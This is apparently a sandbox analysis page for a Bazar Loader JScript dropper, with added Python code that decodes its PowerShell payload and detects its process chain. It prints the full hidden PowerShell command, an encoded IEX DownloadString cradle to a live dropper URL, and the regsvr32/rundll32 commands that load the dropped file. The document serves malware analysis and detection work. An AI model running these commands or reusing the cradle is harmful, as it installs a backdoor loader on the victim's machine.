Analysis
max time kernel: 136s
max time network: 144s
platform: windows7_x64
resource: win7-en-20210920
submitted: 14-10-2021 18:11
Static task: static1

Behavioral task: behavioral1
  Sample: Stolen Images Evidence.js
  Resource: win7-en-20210920 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: Stolen Images Evidence.js
  Resource: win10-en-20211014 (windows10_x64)
  0 signatures, 0 seconds
General
Target: Stolen Images Evidence.js
Size: 19KB
MD5: c62b322046bee6a5a86c4fecf5dee72e
SHA1: 18a381be8472fcee623c18cb1bfcf938682bef7d
SHA256: edb86c44b69eb1071a138ec2fd99968a18d671ecbcc6cbd7babcde7a132c1e01
SHA512: 2d19000408a61cbf744defb51fc8f0c64f11c74186cdc2f56317641e16fd7c794919ead08ce119c62ec966dcd5a2c62794845e53f4697e657394c9e90ac1f0dc
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Deobfuscated
  URLs
    ps1.dropper  http://bobersok.top/333g100/index.php
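The dropper URL above is recovered from the `-enc` argument that cmd.exe hands to PowerShell further down this report. `-EncodedCommand` is base64 over UTF-16LE text, not over ASCII, which is why a plain base64 decode shows a NUL after every character and why the blob is peppered with `A` characters. The script below is an added example for this page, not part of the sandbox output: it decodes that exact argument, pulls the URL out of the result, and applies a small heuristic for the `IEX ... DownloadString` cradle. The encoded string is copied from the page; the regular expression and the cradle heuristic are this example's own assumptions.

```python
import base64
import re

# The -enc argument exactly as it appears in the cmd.exe and powershell.exe
# command lines of this report (copied from the page, not constructed).
ENCODED_COMMAND = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA=="

# Assumed URL shape: stop at whitespace, quotes or parentheses, which is what
# closes the literal inside DownloadString("...").
URL_RE = re.compile(r'https?://[^\s"\'()]+')


def decode_encoded_command(blob: str) -> str:
    """Decode a PowerShell -EncodedCommand / -enc argument to text.

    PowerShell expects base64 over UTF-16LE. Trailing '=' padding is restored
    first because some loaders strip it, and strict validation rejects blobs
    that were mangled in transit (for instance by line wrapping).
    """
    padded = blob + "=" * (-len(blob) % 4)
    raw = base64.b64decode(padded, validate=True)
    if len(raw) % 2:
        raise ValueError("decoded length is odd; this is not UTF-16LE text")
    return raw.decode("utf-16-le")


def extract_urls(command: str) -> list:
    """Return every http(s) URL found in a decoded command line, in order."""
    return URL_RE.findall(command)


def is_download_cradle(command: str) -> bool:
    """Heuristic for the classic 'IEX (New-Object Net.WebClient).DownloadString(...)' cradle.

    Compared case-insensitively because PowerShell is, and so are the people
    who write 'POwersheLL' to dodge naive string matching.
    """
    c = command.lower()
    return ("iex" in c or "invoke-expression" in c) and "downloadstring" in c


if __name__ == "__main__":
    decoded = decode_encoded_command(ENCODED_COMMAND)
    print("decoded :", decoded)
    print("urls    :", extract_urls(decoded))
    print("cradle  :", is_download_cradle(decoded))
```

Running it prints the decoded cradle, `IEX (New-Object Net.Webclient).downloadstring("http://bobersok.top/333g100/index.php")`, which matches the `ps1.dropper` URL the sandbox extracted. The `validate=True` flag matters in practice: a blob copied out of a web page with a stray space in it should fail loudly rather than decode to garbage that gets pasted into a blocklist.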
Signatures

Bazar Loader
  Detected loader normally used to deploy BazarBackdoor malware.

Bazar/Team9 Loader payload (2 IoCs)
  resource                                                                      yara_rule
  behavioral1/memory/1680-67-0x0000000000140000-0x0000000000168000-memory.dmp   BazarLoaderVar6
  behavioral1/memory/1904-69-0x0000000000230000-0x0000000000258000-memory.dmp   BazarLoaderVar6
  (Both hits are in the memory of the two processes that load the dropped FHbKnfj.dat: regsvr32.exe PID 1680 and rundll32.exe PID 1904.)

Blocklisted process makes network request (1 IoC)
  flow  pid  Process
  5     576  powershell.exe

Loads dropped DLL (2 IoCs)
  pid   Process
  1680  regsvr32.exe
  1904  rundll32.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  (This is the sandbox's stock description for the heuristic. Nothing else in this report points to ransomware, and the payload detected in memory is a loader, so treat the drive enumeration as environment fingerprinting unless further stages show otherwise.)

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid  Process
  576  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid  Process
  Token: SeDebugPrivilege  576  powershell.exe

Suspicious use of WriteProcessMemory (11 IoCs)
  description                       pid   Process         procid_target  occurrences
  PID 1116 wrote to memory of 1372  1116  wscript.exe     27             3
  PID 1372 wrote to memory of 576   1372  cmd.exe         29             3
  PID 576 wrote to memory of 1680   576   powershell.exe  30             5
  (The 11 rows in the original report are these three parent-to-child writes repeated; each matches an edge of the process tree below, so they record process creation rather than injection into an unrelated process.)
Processes

C:\Windows\system32\wscript.exe  (PID 1116)
  wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
  - Suspicious use of WriteProcessMemory
  └─ C:\Windows\System32\cmd.exe  (PID 1372)
       "C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
       - Suspicious use of WriteProcessMemory
       └─ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 576)
            POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
            (the -enc argument is base64 over UTF-16LE and decodes to: IEX (New-Object Net.Webclient).downloadstring("http://bobersok.top/333g100/index.php"))
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            └─ C:\Windows\System32\regsvr32.exe  (PID 1680)
                 "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat
                 - Loads dropped DLL

C:\Windows\System32\rundll32.exe  (PID 1904, second root process; no parent recorded in the report)
  C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat,DllRegisterServer {749609AF-8C93-44BA-A2BA-C66B158CBE86}
  - Loads dropped DLL
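The process tree is the part of this report that turns into a detection: a script host (wscript.exe) spawns cmd.exe, which spawns PowerShell with `-w hidden -ep bypass -enc`, which in turn launches regsvr32.exe against a `.dat` file in `%TEMP%`. The script below is an added example and not part of the sandbox output or the Bazar tooling: it runs two rules over a constructed batch of process-creation events shaped like this tree (same PIDs and command lines as the page, with the base64 blob cut short because the rule keys on the flags, plus two benign decoy rows that are invented for the example). The thresholds, the flag regexes and the set of script hosts are this example's own choices.

```python
import re
from typing import Dict, Iterator, List, Tuple

Event = Tuple[int, int, str, str]  # pid, ppid, image path, command line

# Constructed process-creation events. The first four mirror this report's
# tree; the base64 payload is truncated on purpose. PIDs 2000 and 2001 are
# benign decoys that exist only so the rules have something not to fire on.
EVENTS: List[Event] = [
    (1116, 1000, r"C:\Windows\system32\wscript.exe",
     r'wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"'),
    (1372, 1116, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0A'),
    (576, 1372, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0A"),
    (1680, 576, r"C:\Windows\System32\regsvr32.exe",
     r'"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat'),
    (2000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    (2001, 1000, r"C:\Windows\System32\regsvr32.exe",
     r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}   # assumed list
LOADERS = {"regsvr32.exe", "rundll32.exe"}

# powershell.exe accepts unambiguous prefixes of its switches, so each regex
# covers the short forms operators actually type (-enc, -w hidden, -ep bypass).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?(?=\s)")
HIDDEN_FLAG = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
BYPASS_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:p|x|xec|xecutionpolicy)\s+bypass\b")
# A module path under the user's Temp directory; group 1 is its extension.
TEMP_MODULE = re.compile(r'(?i)\\AppData\\Local\\Temp\\[^\s"]*?\.(\w+)(?=["\s,]|$)')


def name_of(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(index: Dict[int, Event], pid: int, max_depth: int = 8) -> Iterator[Tuple[int, str]]:
    """Walk parent links upward, nearest ancestor first; bounded against PID-reuse loops."""
    seen = set()
    ppid = index[pid][1]
    while ppid in index and ppid not in seen and len(seen) < max_depth:
        seen.add(ppid)
        yield ppid, name_of(index[ppid][2])
        ppid = index[ppid][1]


def powershell_flags(cmdline: str) -> List[str]:
    """Names of the evasion-style switches present on a PowerShell command line."""
    checks = (("encoded", ENCODED_FLAG), ("hidden", HIDDEN_FLAG), ("bypass", BYPASS_FLAG))
    return [label for label, rx in checks if rx.search(cmdline)]


def dropped_module(cmdline: str):
    """Return a Temp-directory module path whose extension is not .dll, else None."""
    m = TEMP_MODULE.search(cmdline)
    if m and m.group(1).lower() != "dll":
        return m.group(0)
    return None


def detect(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Apply both rules; returns (pid, rule, detail) triples."""
    index = {ev[0]: ev for ev in events}
    alerts = []
    for pid, _ppid, image, cmdline in events:
        name = name_of(image)
        chain = [n for _, n in ancestors(index, pid)]
        from_script_host = any(n in SCRIPT_HOSTS for n in chain)
        # Rule 1: encoded PowerShell. -enc alone is common in admin tooling, so
        # require a script-host ancestor or a second evasion flag. The cmd.exe
        # wrapper is checked too, since it carries the same command line.
        if name == "powershell.exe" or "powershell" in cmdline.lower():
            flags = powershell_flags(cmdline)
            if "encoded" in flags and (from_script_host or len(flags) >= 2):
                alerts.append((pid, "encoded_powershell",
                               "flags=%s chain=%s" % ("+".join(flags), " <- ".join([name] + chain))))
        # Rule 2: regsvr32/rundll32 loading a non-.dll module out of %TEMP%.
        elif name in LOADERS:
            module = dropped_module(cmdline)
            if module:
                alerts.append((pid, "loader_from_temp", "%s loads %s" % (name, module)))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(pid, rule, detail)
```

Against the constructed batch, rule 1 fires on PID 1372 (cmd.exe wrapper) and PID 576, rule 2 on PID 1680, and neither decoy alerts. The second rule deliberately ignores the file extension's meaning and keys on the location instead: a loader that registers `FHbKnfj.dat` from Temp is suspicious whatever the bytes inside are, and renaming the payload to `.dll` would only move it to a different, location-based rule.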